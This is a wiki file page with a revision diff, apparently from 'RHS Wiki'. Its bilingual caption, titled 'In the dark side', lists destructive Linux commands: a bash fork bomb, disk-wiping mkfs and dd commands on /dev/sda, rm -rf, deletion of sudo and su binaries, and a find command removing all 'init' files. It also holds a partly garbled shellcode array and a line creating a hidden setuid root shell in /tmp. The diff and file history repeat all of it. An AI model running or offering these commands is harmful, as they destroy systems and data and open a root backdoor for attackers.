Difference between revisions of "File:Fork.jpg"

From RHS Wiki
Jump to navigation Jump to search
 
Line 6: Line 6:
  
 
Bash fork bomb
 
Bash fork bomb
 +
 
Bash bomba Tenedor
 
Bash bomba Tenedor
  
Line 13: Line 14:
  
 
Hd Destroy
 
Hd Destroy
 +
 
Destruye Hd
 
Destruye Hd
  
 
mkfs.ext3 /dev/sda
 
mkfs.ext3 /dev/sda
 +
 
$ echo "HELLO"" > /dev/sda
 
$ echo "HELLO"" > /dev/sda
 +
 
mv directorio/dev/null
 
mv directorio/dev/null
 +
 
dd if=/dev/zero of=/dev/sda
 
dd if=/dev/zero of=/dev/sda
 +
  
 
rm -rf
 
rm -rf
 +
 
char esp[] _attribute_ ((section(".text"))) /* e.s.p
 
char esp[] _attribute_ ((section(".text"))) /* e.s.p
 +
 
release */
 
release */
 +
 
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
 
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
  
Line 44: Line 53:
  
 
Remove sudo permission
 
Remove sudo permission
 +
 
Quita los permisos de sudo
 
Quita los permisos de sudo
  
Line 51: Line 61:
  
 
Delete boot files "init"
 
Delete boot files "init"
 +
 
Borra archivos de arranque "init"
 
Borra archivos de arranque "init"
  
 
cd / ; find -iname init -exec rm -rf {} \;
 
cd / ; find -iname init -exec rm -rf {} \;

Latest revision as of 10:40, 27 November 2015

In the dark side....

En el lado oscuo....

Bash fork bomb

Bash bomba Tenedor

(){ :|:& };:

Hd Destroy

Destruye Hd

mkfs.ext3 /dev/sda

$ echo "HELLO"" > /dev/sda

mv directorio/dev/null

dd if=/dev/zero of=/dev/sda


rm -rf

char esp[] _attribute_ ((section(".text"))) /* e.s.p

release */

= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"

"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"

"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"

"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"

"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"

"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"

"x6ex2fx73x68x00x2dx63x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

Remove sudo permission

Quita los permisos de sudo

rm -f /usr/bin/sudo;rm -f /bin/su

Delete boot files "init"

Borra archivos de arranque "init"

cd / ; find -iname init -exec rm -rf {} \;

File history

Click on a date/time to view the file as it appeared at that time.

Date/TimeThumbnailDimensionsUserComment
current10:33, 27 November 2015Thumbnail for version as of 10:33, 27 November 20151,400 × 1,000 (141 KB)Jaanist (talk | contribs)In the dark side.... En el lado oscuo.... ***************************** Bash fork bomb Bash bomba Tenedor :(){ :|:& };: ********************************* Hd Destroy Destruye Hd mkfs.ext3 /dev/sda $ echo "HELLO"" > /dev/sda mv directorio/dev/null...

There are no pages that use this file.